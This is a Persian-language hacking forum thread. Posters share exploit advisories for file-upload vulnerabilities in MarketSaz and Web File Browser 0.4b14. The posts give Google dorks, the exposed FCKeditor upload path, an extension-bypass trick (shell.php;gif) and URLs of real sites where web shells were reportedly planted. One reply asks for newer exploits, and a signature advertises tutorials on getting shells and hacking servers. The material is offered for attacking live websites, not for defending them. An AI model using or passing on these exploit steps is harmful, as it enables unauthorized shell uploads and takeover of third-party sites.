IT Security Team  
قدیمی 06-19-2010, 07:25 PM   #1
اعضای قدیمی
 
| Red | آواتار ها
 
تاریخ عضویت: Feb 2010
نوشته ها: 107
Thanks: 67
Thanked 429 Times in 64 Posts
| Red | به Yahoo ارسال پیام
پیش فرض MarketSaz remote file Upload Vulnerability

البته ایشون پیداش نکرده ولی به اسم ایشون ثبت شده
هرجا هستن موفق باشن
کد:
http://inj3ct0r.com/exploits/12768
کد:
==========================================
MarketSaz remote file Upload Vulnerability
==========================================


#Exploit Title: MarketSaz remote file uploade

#Author: NetQurd (NetQurd@Live.com)

#Dork : English = Powered MarketSaz


#Software Link:  http://www.marketsaz.com

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Example site: http://www.langarshop.ir

#Select the "File Upload" To use = php

#http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Sh3ll : http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#OR

#http://www.langarshop.ir/shell.php


# Inj3ct0r.com [2010-06-18]
__________________
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
آموزش شل گیری !
آموزش بایپس کردن آپلودسنتر !
آموزش کار با شل !
آموزش سرور هکینگ - استفاده از باگ سی پنل!
همه و همه در
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
| Red | آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to | Red | For This Useful Post:
h_ou20 (08-17-2011)
قدیمی 02-01-2011, 06:08 PM   #2
عضو جديد
 
h_ou20 آواتار ها
 
تاریخ عضویت: Aug 2010
نوشته ها: 9
Thanks: 17
Thanked 0 Times in 0 Posts
پیش فرض

نقل قول:
نوشته اصلی توسط | red | نمایش پست ها
البته ایشون پیداش نکرده ولی به اسم ایشون ثبت شده
هرجا هستن موفق باشن
کد:
http://inj3ct0r.com/exploits/12768
کد:
==========================================
marketsaz remote file upload vulnerability
==========================================


#exploit title: Marketsaz remote file uploade

#author: Netqurd (netqurd@live.com)

#dork : English = powered marketsaz


#software link:  Http://www.marketsaz.com

#platform :linux/php

#exploit : Http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#example site: Http://www.langarshop.ir

#select the "file upload" to use = php

#http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#sh3ll : Http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#or

#http://www.langarshop.ir/shell.php


# inj3ct0r.com [2010-06-18]

----------------------------------------------------------------------------------------------------------------------
این که قدیمی شده....دیگه کار نمیکنه.....اگه آسیب پذیری های دیگه رو دارین لطف کنین بزارین...

با تشکر
----------------------------------------------------------------------------------------------------------------------
h_ou20 آنلاین نیست.   پاسخ با نقل قول
قدیمی 06-21-2011, 09:07 AM   #3
عضو جديد
 
xpl_a آواتار ها
 
تاریخ عضویت: Jun 2011
نوشته ها: 79
Thanks: 10
Thanked 29 Times in 18 Posts
پیش فرض

نقل قول:
نوشته اصلی توسط h_ou20 نمایش پست ها
----------------------------------------------------------------------------------------------------------------------
این که قدیمی شده....دیگه کار نمیکنه.....اگه آسیب پذیری های دیگه رو دارین لطف کنین بزارین...

با تشکر
----------------------------------------------------------------------------------------------------------------------
بفرما دوست عزیز این هم یک نمونه rfu دیگر که البته جدیدترین آسیب پذیری که کشف شده تو cms ایرانی باگ nuke می باشد
کد:
##################################################################
# Title : Web File Browser 0.4b14 => File[Shell]upload,Information Disclosure Vulnerability. 
#
# Author: eXeSoul
#
# Home  : 1337day.com  / www.indishell.in or www.andhrahackers.com
#
# Email : exe.soul@live.com
#
# date  : 13/5/2011
#
# d0rk:- intext:Web File Browser 0.4b14
#       
##################################################################
################################################################## 
#
#                       _ _ _ 
#                   .-"      "-.
#                  /            \
#                 |    eXeSoul   |
#                 |,  .-.  .-.  ,|
#                 | )(_o/  \o_)( |      
#                 |/     /\     \|           
#       (@_       (_     ^^     _)
#  _     ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
#        )_/         \       / 
#       (@     
#
#            +-+-+-+-+-+-+-+-+-+-+
#         --+|I|N|D|I|S|H|E|L||L|+--
#            +-+-+-+-+-+-+-+-+-+-+
#
#
################################################################## 
##################################################################
#
#    [1]
#
#    Go To Site :-
#
#   => Find its main web file Browser php file it can be anything.php
#   => you can upload file , shell anything on unpatched vrsion of Web file Browser.!
#   => upload shell via shell.php;gif or shell.php.gif like anything try temper data.!
#   => thats up to you and your skill :-P
#   => \m/
#
#   The shell ends up in the same directory.
#    
#    D3mo :-   http://pics.kick.at/autohin/index.php
#              http://hipi.comuv.com/wfb/index.php
#
xpl_a آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to xpl_a For This Useful Post:
h_ou20 (08-17-2011)
پاسخ

ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال



اکنون ساعت 08:02 PM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.